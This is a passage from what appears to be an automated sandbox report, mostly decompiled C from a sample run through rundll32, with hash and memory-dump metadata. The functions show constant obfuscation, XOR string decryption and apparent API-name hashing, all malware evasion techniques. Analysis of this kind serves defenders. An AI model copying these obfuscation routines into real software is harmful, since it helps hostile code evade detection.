                                                                                                                                  				_v16 = _v16 / _t116;
                                                                                                                                  				_v16 = _v16 << 4;
                                                                                                                                  				_v16 = _v16 >> 9;
                                                                                                                                  				_v16 = _v16 ^ 0x00004840;
                                                                                                                                  				_v20 = 0xb3d6e6;
                                                                                                                                  				_v20 = _v20 ^ 0x61ac6c83;
                                                                                                                                  				_v20 = _v20 ^ 0xeb92407c;
                                                                                                                                  				_v20 = _v20 ^ 0x8a8fe9bf;
                                                                                                                                  				_v40 = 0xbcf254;
                                                                                                                                  				_v40 = _v40 << 0xc;
                                                                                                                                  				_v40 = _v40 ^ 0xcf275652;
                                                                                                                                  				_push(_v44);
                                                                                                                                  				_push(_v28);
                                                                                                                                  				E002DA918(_a4, _v40, _v36, _v8, E002EDCF7(_v32, 0x2d17c0, _v40), _v12,  &_v564);
                                                                                                                                  				E002DA8B0(_v24, _t107, _v16);
                                                                                                                                  				return E002E1F8A(_v20, _v40,  &_v564);
                                                                                                                                  			}



















                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: a3}
                                                                                                                                  • API String ID: 0-1821053108
                                                                                                                                  • Opcode ID: 3e2f485354acf59896f0e21cd0f7dea3c2c150fcf606ab418536b2e49894b9d3
                                                                                                                                  • Instruction ID: 927867dc922972847bec9976eb9565ae6375b18c40360bc76a1da1d76cde85c8
                                                                                                                                  • Opcode Fuzzy Hash: 3e2f485354acf59896f0e21cd0f7dea3c2c150fcf606ab418536b2e49894b9d3
                                                                                                                                  • Instruction Fuzzy Hash: A9410271D0020AEBCF09CFE1D94A4EEBBB2FB44314F20805AE511B6260D7B55B55DFA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                  			E002E8606(void* __ecx, signed int* __edx, void* __eflags) {
                                                                                                                                  				void* _t46;
                                                                                                                                  				signed int _t50;
                                                                                                                                  				unsigned int* _t63;
                                                                                                                                  				signed int _t64;
                                                                                                                                  				signed int _t66;
                                                                                                                                  				signed int _t72;
                                                                                                                                  				unsigned int _t73;
                                                                                                                                  				unsigned int _t74;
                                                                                                                                  				unsigned int* _t78;
                                                                                                                                  				signed int* _t79;
                                                                                                                                  				signed int* _t80;
                                                                                                                                  				unsigned int _t82;
                                                                                                                                  				void* _t88;
                                                                                                                                  				void* _t90;
                                                                                                                                  				void* _t92;
                                                                                                                                  				void* _t93;
                                                                                                                                  
                                                                                                                                  				_push( *(_t92 + 0x2c));
                                                                                                                                  				_push( *(_t92 + 0x2c));
                                                                                                                                  				_push( *(_t92 + 0x2c));
                                                                                                                                  				_push(__edx);
                                                                                                                                  				E002E20B9(_t46);
                                                                                                                                  				 *(_t92 + 0x20) = 0xe2d3c4;
                                                                                                                                  				_t79 =  &(__edx[1]);
                                                                                                                                  				 *(_t92 + 0x20) =  *(_t92 + 0x20) + 0xa17d;
                                                                                                                                  				 *(_t92 + 0x20) =  *(_t92 + 0x20) << 0x10;
                                                                                                                                  				 *(_t92 + 0x20) =  *(_t92 + 0x20) ^ 0xc7a816b6;
                                                                                                                                  				 *(_t92 + 0x20) =  *(_t92 + 0x20) ^ 0xb2e477eb;
                                                                                                                                  				 *(_t92 + 0x28) = 0xf8496b;
                                                                                                                                  				 *(_t92 + 0x28) =  *(_t92 + 0x28) >> 0xa;
                                                                                                                                  				 *(_t92 + 0x28) =  *(_t92 + 0x28) * 0x37;
                                                                                                                                  				 *(_t92 + 0x28) =  *(_t92 + 0x28) ^ 0x0006b61c;
                                                                                                                                  				 *(_t92 + 0x24) = 0x2326e4;
                                                                                                                                  				 *(_t92 + 0x24) =  *(_t92 + 0x24) | 0x0bc2d168;
                                                                                                                                  				 *(_t92 + 0x24) =  *(_t92 + 0x24) << 4;
                                                                                                                                  				 *(_t92 + 0x24) =  *(_t92 + 0x24) ^ 0xbe3c76f1;
                                                                                                                                  				_t66 =  *__edx;
                                                                                                                                  				_t80 =  &(_t79[1]);
                                                                                                                                  				_t50 =  *_t79 ^ _t66;
                                                                                                                                  				 *(_t92 + 0x2c) = _t66;
                                                                                                                                  				 *(_t92 + 0x30) = _t50;
                                                                                                                                  				_t30 = _t50 + 1; // 0xb
                                                                                                                                  				_t82 =  !=  ? (_t30 & 0xfffffffc) + 4 : _t30;
                                                                                                                                  				_t93 = _t92 + 0xc;
                                                                                                                                  				_t63 = E002D7FF2(_t82);
                                                                                                                                  				 *(_t93 + 0x1c) = _t63;
                                                                                                                                  				if(_t63 != 0) {
                                                                                                                                  					_t90 = 0;
                                                                                                                                  					_t78 = _t63;
                                                                                                                                  					_t88 =  >  ? 0 :  &(_t80[_t82 >> 2]) - _t80 + 3 >> 2;
                                                                                                                                  					if(_t88 != 0) {
                                                                                                                                  						_t64 =  *(_t93 + 0x1c);
                                                                                                                                  						do {
                                                                                                                                  							_t72 =  *_t80;
                                                                                                                                  							_t80 =  &(_t80[1]);
                                                                                                                                  							_t73 = _t72 ^ _t64;
                                                                                                                                  							 *_t78 = _t73;
                                                                                                                                  							_t78 =  &(_t78[1]);
                                                                                                                                  							_t74 = _t73 >> 0x10;
                                                                                                                                  							 *((char*)(_t78 - 3)) = _t73 >> 8;
                                                                                                                                  							 *(_t78 - 2) = _t74;
                                                                                                                                  							_t90 = _t90 + 1;
                                                                                                                                  							 *((char*)(_t78 - 1)) = _t74 >> 8;
                                                                                                                                  						} while (_t90 < _t88);
                                                                                                                                  						_t63 =  *(_t93 + 0x18);
                                                                                                                                  					}
                                                                                                                                  					 *((char*)(_t63 +  *((intOrPtr*)(_t93 + 0x20)))) = 0;
                                                                                                                                  				}
                                                                                                                                  				return _t63;
                                                                                                                                  			}


                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: &#
                                                                                                                                  • API String ID: 0-2240308938
                                                                                                                                  • Opcode ID: 7b9ad6a671dc95800b82af0f3d55b183cd0e6387ee121b23275acf08ce764799
                                                                                                                                  • Instruction ID: 92b24964c807394f3576c30edbf5a6ff4ad3828621ec6c47f8b59fb0b3177c5d
                                                                                                                                  • Opcode Fuzzy Hash: 7b9ad6a671dc95800b82af0f3d55b183cd0e6387ee121b23275acf08ce764799
                                                                                                                                  • Instruction Fuzzy Hash: 7B319C726183418FC304CF29C88581BFBE0FF98718F454B6DE88AA7241D774EA09CB96
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                  			E002EDCF7(void* __ecx, signed int* __edx, void* __eflags) {
                                                                                                                                  				void* _t39;
                                                                                                                                  				signed int _t43;
                                                                                                                                  				signed int _t60;
                                                                                                                                  				signed int _t61;
                                                                                                                                  				signed int _t63;
                                                                                                                                  				signed int _t70;
                                                                                                                                  				unsigned int _t71;
                                                                                                                                  				unsigned int _t72;
                                                                                                                                  				signed int _t76;
                                                                                                                                  				signed int* _t77;
                                                                                                                                  				signed int* _t78;
                                                                                                                                  				unsigned int _t80;
                                                                                                                                  				void* _t86;
                                                                                                                                  				short _t88;
                                                                                                                                  				void* _t90;
                                                                                                                                  				void* _t91;
                                                                                                                                  
                                                                                                                                  				_push( *(_t90 + 0x28));
                                                                                                                                  				_push( *(_t90 + 0x28));
                                                                                                                                  				_push(__edx);
                                                                                                                                  				E002E20B9(_t39);
                                                                                                                                  				 *(_t90 + 0x24) = 0xf19f37;
                                                                                                                                  				_t77 =  &(__edx[1]);
                                                                                                                                  				 *(_t90 + 0x24) =  *(_t90 + 0x24) * 0x42;
                                                                                                                                  				 *(_t90 + 0x24) =  *(_t90 + 0x24) ^ 0x3e4cf98f;
                                                                                                                                  				 *(_t90 + 0x20) = 0xb1a340;
                                                                                                                                  				 *(_t90 + 0x20) =  *(_t90 + 0x20) + 0xbcd0;
                                                                                                                                  				 *(_t90 + 0x20) =  *(_t90 + 0x20) ^ 0x00b2d2cb;
                                                                                                                                  				 *(_t90 + 0x1c) = 0x9743e1;
                                                                                                                                  				 *(_t90 + 0x1c) =  *(_t90 + 0x1c) | 0x457c67e3;
                                                                                                                                  				 *(_t90 + 0x1c) =  *(_t90 + 0x1c) ^ 0x45f711d7;
                                                                                                                                  				_t63 =  *__edx;
                                                                                                                                  				_t78 =  &(_t77[1]);
                                                                                                                                  				_t43 =  *_t77 ^ _t63;
                                                                                                                                  				 *(_t90 + 0x28) = _t63;
                                                                                                                                  				 *(_t90 + 0x2c) = _t43;
                                                                                                                                  				_t21 = _t43 + 1; // 0xf19f38
                                                                                                                                  				_t80 =  !=  ? (_t21 & 0xfffffffc) + 4 : _t21;
                                                                                                                                  				_t91 = _t90 + 8;
                                                                                                                                  				_t60 = E002D7FF2(_t80 + _t80);
                                                                                                                                  				 *(_t91 + 0x1c) = _t60;
                                                                                                                                  				if(_t60 != 0) {
                                                                                                                                  					_t88 = 0;
                                                                                                                                  					_t76 = _t60;
                                                                                                                                  					_t86 =  >  ? 0 :  &(_t78[_t80 >> 2]) - _t78 + 3 >> 2;
                                                                                                                                  					if(_t86 != 0) {
                                                                                                                                  						_t61 =  *(_t91 + 0x1c);
                                                                                                                                  						do {
                                                                                                                                  							_t70 =  *_t78;
                                                                                                                                  							_t78 =  &(_t78[1]);
                                                                                                                                  							_t71 = _t70 ^ _t61;
                                                                                                                                  							 *_t76 = _t71 & 0x000000ff;
                                                                                                                                  							_t76 = _t76 + 8;
                                                                                                                                  							 *((short*)(_t76 - 6)) = _t71 >> 0x00000008 & 0x000000ff;
                                                                                                                                  							_t72 = _t71 >> 0x10;
                                                                                                                                  							_t88 = _t88 + 1;
                                                                                                                                  							 *((short*)(_t76 - 4)) = _t72 & 0x000000ff;
                                                                                                                                  							 *((short*)(_t76 - 2)) = _t72 >> 0x00000008 & 0x000000ff;
                                                                                                                                  						} while (_t88 < _t86);
                                                                                                                                  						_t60 =  *(_t91 + 0x18);
                                                                                                                                  					}
                                                                                                                                  					 *((short*)(_t60 +  *(_t91 + 0x20) * 2)) = 0;
                                                                                                                                  				}
                                                                                                                                  				return _t60;
                                                                                                                                  			}




















                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: g|E
                                                                                                                                  • API String ID: 0-3824901942
                                                                                                                                  • Opcode ID: 434da03f0d83d3a5d6d93c32cdb42b6ac713b1fcc8cbc1b08d0d3376fbdc5032
                                                                                                                                  • Instruction ID: e26bed6c180444216799d00ef71702ed0a83f9dbe54aac114c8bf61d92f05d1a
                                                                                                                                  • Opcode Fuzzy Hash: 434da03f0d83d3a5d6d93c32cdb42b6ac713b1fcc8cbc1b08d0d3376fbdc5032
                                                                                                                                  • Instruction Fuzzy Hash: 9531AF766183128FC314DF29C48146AF7E0FF88318F414B6EE889AB251D774EA09CF96
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                  			E002D51BB() {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				intOrPtr _v32;
                                                                                                                                  				void* _t72;
                                                                                                                                  				intOrPtr _t83;
                                                                                                                                  				signed int _t87;
                                                                                                                                  				signed int _t88;
                                                                                                                                  				signed int _t89;
                                                                                                                                  
                                                                                                                                  				_v28 = _v28 & 0x00000000;
                                                                                                                                  				_v32 = 0x54cf7d;
                                                                                                                                  				_v16 = 0x3835ff;
                                                                                                                                  				_v16 = _v16 >> 0xa;
                                                                                                                                  				_v16 = _v16 * 0x17;
                                                                                                                                  				_v16 = _v16 ^ 0x00095bb8;
                                                                                                                                  				_t72 = 0xe98fb1d;
                                                                                                                                  				_v24 = 0x583681;
                                                                                                                                  				_t87 = 0x44;
                                                                                                                                  				_v24 = _v24 / _t87;
                                                                                                                                  				_v24 = _v24 ^ 0x000eb9f7;
                                                                                                                                  				_v12 = 0x832b1f;
                                                                                                                                  				_v12 = _v12 << 5;
                                                                                                                                  				_v12 = _v12 | 0x242a8544;
                                                                                                                                  				_v12 = _v12 ^ 0x346a2866;
                                                                                                                                  				_v8 = 0x6a77bb;
                                                                                                                                  				_v8 = _v8 >> 0xe;
                                                                                                                                  				_t88 = 0x19;
                                                                                                                                  				_v8 = _v8 / _t88;
                                                                                                                                  				_v8 = _v8 ^ 0x9d9369f0;
                                                                                                                                  				_v8 = _v8 ^ 0x9d908f3a;
                                                                                                                                  				_v20 = 0x4802c8;
                                                                                                                                  				_t89 = 0x21;
                                                                                                                                  				_v20 = _v20 / _t89;
                                                                                                                                  				_v20 = _v20 + 0xffffbfc3;
                                                                                                                                  				_v20 = _v20 ^ 0x000df493;
                                                                                                                                  				do {
                                                                                                                                  					while(_t72 != 0x9835b86) {
                                                                                                                                  						if(_t72 == 0xe98fb1d) {
                                                                                                                                  							_push(_t72);
                                                                                                                                  							_push(_t72);
                                                                                                                                  							 *0x2f3e04 = E002D7FF2(0x134);
                                                                                                                                  							_t72 = 0x9835b86;
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						goto L5;
                                                                                                                                  					}
                                                                                                                                  					_t83 =  *0x2f3e04; // 0x0
                                                                                                                                  					E002E0001(_v8, _t83 + 0x18, _v20);
                                                                                                                                  					_t72 = 0x7dce4e4;
                                                                                                                                  					L5:
                                                                                                                                  				} while (_t72 != 0x7dce4e4);
                                                                                                                                  				return 1;
                                                                                                                                  			}
















                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: f(j4
                                                                                                                                  • API String ID: 0-3086030595
                                                                                                                                  • Opcode ID: 2c61d0e7c08fbfb28a8b20ba1a7311056cd4390a4bb1edc3c7c09fd3cdb11945
                                                                                                                                  • Instruction ID: 697c5411c815d61a2bbd37efdc156cb53f59336070797f4297d5805ef8335c65
                                                                                                                                  • Opcode Fuzzy Hash: 2c61d0e7c08fbfb28a8b20ba1a7311056cd4390a4bb1edc3c7c09fd3cdb11945
                                                                                                                                  • Instruction Fuzzy Hash: B4314D71E11219ABCF04DFAAD5495EEFBB1FB44324F20809AD505AB250D3B45F59CF80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                  			E002D2051(void* __edx, signed int _a4, intOrPtr _a8) {
                                                                                                                                  				intOrPtr _v4;
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				intOrPtr _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				void* _t71;
                                                                                                                                  				signed int _t78;
                                                                                                                                  				signed int _t80;
                                                                                                                                  				signed int _t83;
                                                                                                                                  				signed int _t92;
                                                                                                                                  				signed int _t95;
                                                                                                                                  				signed short* _t97;
                                                                                                                                  
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_t97 = _a4;
                                                                                                                                  				_push(_t97);
                                                                                                                                  				E002E20B9(_t71);
                                                                                                                                  				_v16 = 0x71ca23;
                                                                                                                                  				_v12 = 0x57f692;
                                                                                                                                  				_v8 = 0;
                                                                                                                                  				_v4 = 0;
                                                                                                                                  				_v20 = 0xd3252c;
                                                                                                                                  				_v20 = _v20 + 0x4351;
                                                                                                                                  				_v20 = _v20 + 0xffff5b79;
                                                                                                                                  				_v20 = _v20 ^ 0x00d2c3f6;
                                                                                                                                  				_a4 = 0xbb067e;
                                                                                                                                  				_t83 = 0x11;
                                                                                                                                  				_a4 = _a4 / _t83;
                                                                                                                                  				_a4 = _a4 >> 8;
                                                                                                                                  				_a4 = _a4 ^ 0xac5d3832;
                                                                                                                                  				_a4 = _a4 ^ 0xac5d3334;
                                                                                                                                  				_a4 = 0xab60c2;
                                                                                                                                  				_a4 = _a4 << 0x10;
                                                                                                                                  				_a4 = _a4 ^ 0x910d5570;
                                                                                                                                  				_a4 = _a4 >> 4;
                                                                                                                                  				_a4 = _a4 ^ 0x0f1cf547;
                                                                                                                                  				if( *_t97 != 0) {
                                                                                                                                  					do {
                                                                                                                                  						_t80 = _v20;
                                                                                                                                  						_a4 = 0xbb067e;
                                                                                                                                  						_a4 = _a4 / _t83;
                                                                                                                                  						_a4 = _a4 >> 8;
                                                                                                                                  						_a4 = _a4 ^ 0xac5d3832;
                                                                                                                                  						_a4 = _a4 ^ 0xac5d3334;
                                                                                                                                  						_a4 = 0xab60c2;
                                                                                                                                  						_a4 = _a4 << 0x10;
                                                                                                                                  						_a4 = _a4 ^ 0x910d5570;
                                                                                                                                  						_a4 = _a4 >> 4;
                                                                                                                                  						_a4 = _a4 ^ 0x0f1cf547;
                                                                                                                                  						_t92 = _v20 << _a4;
                                                                                                                                  						_t78 =  *_t97 & 0x0000ffff;
                                                                                                                                  						_t95 = _v20 << _a4;
                                                                                                                                  						if(_t78 >= 0x41 && _t78 <= 0x5a) {
                                                                                                                                  							_t78 = _t78 + 0x20;
                                                                                                                                  						}
                                                                                                                                  						_v20 = _t78;
                                                                                                                                  						_t97 =  &(_t97[1]);
                                                                                                                                  						_v20 = _v20 + _t92;
                                                                                                                                  						_v20 = _v20 + _t95;
                                                                                                                                  						_v20 = _v20 - _t80;
                                                                                                                                  						_t83 = 0x11;
                                                                                                                                  					} while ( *_t97 != 0);
                                                                                                                                  				}
                                                                                                                                  				return _v20;
                                                                                                                                  			}
















                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: QC
                                                                                                                                  • API String ID: 0-229404352
                                                                                                                                  • Opcode ID: f90a2f0d9400246e94e52ce9e9c4602303884de4e781704f0e0226566f48be9f
                                                                                                                                  • Instruction ID: 960fb44c01f65bc1b8e4a8e53ab8e281feb7c7cae8e4476d36991f7a23eb025e
                                                                                                                                  • Opcode Fuzzy Hash: f90a2f0d9400246e94e52ce9e9c4602303884de4e781704f0e0226566f48be9f
                                                                                                                                  • Instruction Fuzzy Hash: BD3115719183818BD315DF29C48905BBBE0FFD87A8F548E1DF4C9A2225D3B4CA98CB56
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                  			E002E176B(void* __ecx, void* __eflags) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				intOrPtr _v40;
                                                                                                                                  				signed int _t87;
                                                                                                                                  				signed int _t91;
                                                                                                                                  				signed int _t92;
                                                                                                                                  				signed int _t93;
                                                                                                                                  				void* _t102;
                                                                                                                                  				signed int _t103;
                                                                                                                                  
                                                                                                                                  				_v36 = _v36 & 0x00000000;
                                                                                                                                  				_v40 = 0x355323;
                                                                                                                                  				_v24 = 0x6eb9b5;
                                                                                                                                  				_v24 = _v24 + 0x6c21;
                                                                                                                                  				_t102 = __ecx;
                                                                                                                                  				_t91 = 0x64;
                                                                                                                                  				_v24 = _v24 / _t91;
                                                                                                                                  				_v24 = _v24 ^ 0x0005c519;
                                                                                                                                  				_v32 = 0xba69a0;
                                                                                                                                  				_v32 = _v32 << 7;
                                                                                                                                  				_v32 = _v32 ^ 0x5d3c95d0;
                                                                                                                                  				_v20 = 0x99612d;
                                                                                                                                  				_v20 = _v20 | 0x6bf7bfaf;
                                                                                                                                  				_v20 = _v20 + 0x66ac;
                                                                                                                                  				_v20 = _v20 ^ 0x6c036c89;
                                                                                                                                  				_v16 = 0xd72900;
                                                                                                                                  				_v16 = _v16 + 0xffff2462;
                                                                                                                                  				_v16 = _v16 ^ 0xa7b97bfd;
                                                                                                                                  				_v16 = _v16 + 0xffff7578;
                                                                                                                                  				_v16 = _v16 ^ 0xa76084ba;
                                                                                                                                  				_v12 = 0xeb6610;
                                                                                                                                  				_t92 = 0x6f;
                                                                                                                                  				_v12 = _v12 / _t92;
                                                                                                                                  				_v12 = _v12 << 0xf;
                                                                                                                                  				_v12 = _v12 ^ 0x2e835447;
                                                                                                                                  				_v12 = _v12 ^ 0x21f4cf0c;
                                                                                                                                  				_v28 = 0x644f8d;
                                                                                                                                  				_v28 = _v28 << 3;
                                                                                                                                  				_v28 = _v28 << 0xa;
                                                                                                                                  				_v28 = _v28 ^ 0x89f1a004;
                                                                                                                                  				_v8 = 0xbb77ef;
                                                                                                                                  				_t93 = 0x72;
                                                                                                                                  				_v8 = _v8 * 0x3c;
                                                                                                                                  				_v8 = _v8 / _t93;
                                                                                                                                  				_v8 = _v8 << 6;
                                                                                                                                  				_v8 = _v8 ^ 0x18aaba50;
                                                                                                                                  				_t87 = E002E0AE0(_v8, _v28);
                                                                                                                                  				_push(_v12);
                                                                                                                                  				_t103 = _t87;
                                                                                                                                  				_push(_t102);
                                                                                                                                  				_push(_t103);
                                                                                                                                  				_push(3);
                                                                                                                                  				E002D80E3(_v20, _v16);
                                                                                                                                  				 *((short*)(_t102 + _t103 * 2)) = 0;
                                                                                                                                  				return 0;
                                                                                                                                  			}



















                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: #S5
                                                                                                                                  • API String ID: 0-40889119
                                                                                                                                  • Opcode ID: d638e8f48ed8eccc1823991200f18c017b773c580a1b9d4be8890f89af7529be
                                                                                                                                  • Instruction ID: 8dd6c4e77a3a2a6bbad2c8738cff1f1b37ee345d7b88b15e68dabe9d67266998
                                                                                                                                  • Opcode Fuzzy Hash: d638e8f48ed8eccc1823991200f18c017b773c580a1b9d4be8890f89af7529be
                                                                                                                                  • Instruction Fuzzy Hash: 103132B2D0020AEBCB48DFE6C94AAEEBBB1FB44704F20809AD515B6250D7B50B55CF90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E002F09B5(void* __ecx, signed int __edx, void* __eflags) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				char _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				intOrPtr _v44;
                                                                                                                                  				intOrPtr _v48;
                                                                                                                                  				intOrPtr _v52;
                                                                                                                                  				signed int _t77;
                                                                                                                                  				signed int _t88;
                                                                                                                                  				signed int _t89;
                                                                                                                                  
                                                                                                                                  				_v40 = _v40 & 0x00000000;
                                                                                                                                  				_v32 = 4;
                                                                                                                                  				_v52 = 0xab6069;
                                                                                                                                  				_v48 = 0xcf1f96;
                                                                                                                                  				_v44 = 0x29044d;
                                                                                                                                  				_v24 = 0xea6416;
                                                                                                                                  				_v24 = _v24 | 0x7adbff7d;
                                                                                                                                  				_v24 = _v24 ^ 0x5afbff7f;
                                                                                                                                  				_v16 = 0x725236;
                                                                                                                                  				_v16 = _v16 + 0xffff3c91;
                                                                                                                                  				_v16 = _v16 << 7;
                                                                                                                                  				_t88 = 0x2b;
                                                                                                                                  				_v16 = _v16 / _t88;
                                                                                                                                  				_v16 = _v16 ^ 0x015653a2;
                                                                                                                                  				_v12 = 0xbf3984;
                                                                                                                                  				_v12 = _v12 ^ 0x457d3893;
                                                                                                                                  				_t89 = 0x44;
                                                                                                                                  				_v12 = _v12 / _t89;
                                                                                                                                  				_v12 = _v12 + 0x25bc;
                                                                                                                                  				_v12 = _v12 ^ 0x0106bc10;
                                                                                                                                  				_v20 = 0xd655eb;
                                                                                                                                  				_v20 = _v20 | 0x2344b0aa;
                                                                                                                                  				_v20 = _v20 * 0x16;
                                                                                                                                  				_v20 = _v20 ^ 0x147fb4df;
                                                                                                                                  				_v8 = 0x70d8dc;
                                                                                                                                  				_v8 = _v8 + 0xe534;
                                                                                                                                  				_v8 = _v8 ^ 0xb5155b0d;
                                                                                                                                  				_v8 = _v8 >> 7;
                                                                                                                                  				_v8 = _v8 ^ 0x01640b3f;
                                                                                                                                  				_v28 = 0x2d9f47;
                                                                                                                                  				_v28 = _v28 + 0xffffba71;
                                                                                                                                  				_v28 = _v28 ^ 0x002c2593;
                                                                                                                                  				_t77 = E002D94EE(_v16, __ecx, _v24 | __edx, __ecx,  &_v36, _v20, _v8,  &_v32, _v28);
                                                                                                                                  				asm("sbb eax, eax");
                                                                                                                                  				return  ~_t77 & _v36;
                                                                                                                                  			}



















                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 6Rr
                                                                                                                                  • API String ID: 0-3911282678
                                                                                                                                  • Opcode ID: b16a44260abee8cda7f594ea7713937b30baf920b598495c2ffeaef3aed9b357
                                                                                                                                  • Instruction ID: 7dc187272a67253de47be081a2d41e3145ad326e68c039459c76a7b4d2524129
                                                                                                                                  • Opcode Fuzzy Hash: b16a44260abee8cda7f594ea7713937b30baf920b598495c2ffeaef3aed9b357
                                                                                                                                  • Instruction Fuzzy Hash: 8C3101B1D1021EEBCB04CFA5C94A9EEFBB5FB44318F108599D121B6250D3B85B49CF90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                  			E002E8519(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				void* _t55;
                                                                                                                                  
                                                                                                                                  				_push(_a4);
